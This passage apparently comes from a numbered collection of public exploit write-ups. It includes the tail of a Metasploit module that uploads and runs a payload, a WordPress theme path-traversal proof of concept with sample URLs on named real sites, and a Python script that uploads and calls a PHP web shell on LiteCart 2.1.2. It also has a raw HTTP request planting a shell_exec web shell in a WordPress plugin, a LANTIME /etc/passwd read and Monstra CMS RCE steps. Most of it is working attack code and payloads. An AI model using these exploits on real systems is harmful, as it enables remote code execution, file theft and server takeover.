      'uri'      => normalize_uri(target_uri, 'admin.php'),
      'vars_get' => {
        'controller' => 'plugins',
        'action'     => 'config',
        'plugin'     => 'my_image'
      },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      'cookie'   => cookie
    )

    if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
      fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
    elsif res && !(
      res.body.include?('<b>Warning</b>') ||
      res.body.include?('warn')
    )
      fail_with(Failure::Unknown, 'Unable to upload payload.')
    end

    vprint_good("#{peer} - Uploaded the payload.")

    php_fname = 'image.php'
    payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
    vprint_status("#{peer} - Parsed response.")

    register_files_for_cleanup(php_fname)

    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'    => payload_url,
      'method' => 'GET'
    )
  end
end
20.

# Exploit Title: WordPress dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7, Kali

PoC: Arbitrary download of PHP files in all WordPress themes by dreamsmiths:

site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php

Sample:

https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
21.

# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
# Date: 2018-08-27
# Software Link: https://www.litecart.net/downloading?version=2.1.2
# Version: 2.1.2
# CVE : CVE-2018-12256

# 1. Description
# admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers
# to upload a malicious file (resulting in remote code execution) by using the text/xml
# or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.

# 2. Proof of Concept

#!/usr/bin/env python
import mechanize
import cookielib
import urllib2
import requests
import sys
import argparse
import random
import string

parser = argparse.ArgumentParser(description='LiteCart')
parser.add_argument('-t', help='admin login page url - EX: https://IPADDRESS/admin/')
parser.add_argument('-p', help='admin password')
parser.add_argument('-u', help='admin username')
args = parser.parse_args()

if(not args.u or not args.t or not args.p):
    sys.exit("-h for help")

url = args.t
user = args.u
password = args.p

br = mechanize.Browser()
cookiejar = cookielib.LWPCookieJar()
br.set_cookiejar( cookiejar )
br.set_handle_equiv( True )
br.set_handle_redirect( True )
br.set_handle_referer( True )
br.set_handle_robots( False )
br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]

response = br.open(url)
br.select_form(name="login_form")
br["username"] = user
br["password"] = password
res = br.submit()

response = br.open(url + "?app=vqmods&doc=vqmods")
one=""
for form in br.forms():
    one= str(form).split("(")
    one= one[1].split("=")
    one= one[1].split(")")
    one = one[0]

cookies = br._ua_handlers['_cookies'].cookiejar
cookie_dict = {}
for c in cookies:
    cookie_dict[c.name] = c.value

rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))

files = {
    'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
    'token':one,
    'upload':(None,"Upload")
}

response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)

r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
if r.status_code == 200:
    print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
    print r.content
else:
    print "Sorry something went wrong"
22.

# # # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Demo: http://vanguard-demo.esy.es/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # # #
# Description:
# The vulnerability allows a user to upload an arbitrary file.
#
# Vulnerable Source:
# .....................
# $row = $row->fetch(PDO::FETCH_ASSOC);
# $folder_name = $row['id'] * 2;
# $folder_name_2 = $folder_name * 5;
# $check_dir1 = 'uploads/'.$folder_name;
# $check_dir2 = $check_dir.'/'.$folder_name_2;
# if (!is_dir($check_dir1)) { mkdir($check_dir1); }
# if (!is_dir($check_dir2)) { mkdir($check_dir2); }
# $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']);
# $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']);
# $main_path = $check_dir2."/".basename($_FILES['main_file']['name']);
# $error = 0;
# $upload_path = './';
# .....................
#
# Proof of Concept:
#
# Users Add a new product/Add a product preview...
#
# http://localhost/[PATH]/
# http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php
#
# # # # # #
23.

# Exploit Title: Unauthenticated Arbitrary File Upload
# Date: November 12, 2017
# Exploit Author: Colette Chamberland
# Author contact: colette@defiant.com
# Author homepage: https://defiant.com
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446
# Version: < 3.2.0
# Tested on: Wordpress 4.x
# CVE : CVE-2017-16949

Description:
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters.

PoC:

POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6;
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
-----------------------------7230359611602921801124357792--
24.

Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read
Author: Jakub Palaczynski
CVE: CVE-2017-16787

Exploit tested on:
==================
Meinberg LANTIME Web Configuration Utility 6.16.008

Vulnerability affects:
======================
All LTOS6 firmware releases before 6.24.004

Vulnerability:
**************

Arbitrary File Read:
====================
It is possible to read arbitrary files on the system with root permissions.

Proof of Concept:

First instance:
https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx
An Info-User is able to read any file on the system with root permissions.

Second instance:
A user with Admin-User access is able to read any file on the system via the firmware update functionality. Curl accepts the "file" scheme, which actually downloads a file from the local filesystem. It is then possible to download the /upload/update file, which contains the content of the requested file.

Contact:
========
Jakub[dot]Palaczynski[at]gmail[dot]com
25.

Exploit Title: Monstra CMS - 3.0.4 RCE
Vendor Homepage: http://monstra.org/
Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: webapps
Platform: PHP
Advisory Link: https://blogs.securiteam.com/index.php/archives/3559

Description:
MonstraCMS 3.0.4 allows users to upload arbitrary files, which leads to remote command execution on the remote server.

Vulnerable Code:
https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19:

public static function main()
{
    // Array of forbidden types
    $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');

Proof of Concept

Steps to Reproduce:
1. Log in with valid credentials of an Editor
2. Select the Files option from the drop-down menu of Content
3. Upload a file with a PHP (uppercase) extension containing the below code:
<?php $cmd=$_GET['cmd']; system($cmd); ?>
4. Click on Upload
5. Once the file is uploaded, click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami, time, date etc.

Recommended Patch:
We were not able to get the vendor to respond in any way; the software appears to have been left abandoned without support – though this is not an official status on their site (the last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here:
https://github.com/monstra-cms/monstra/issues/426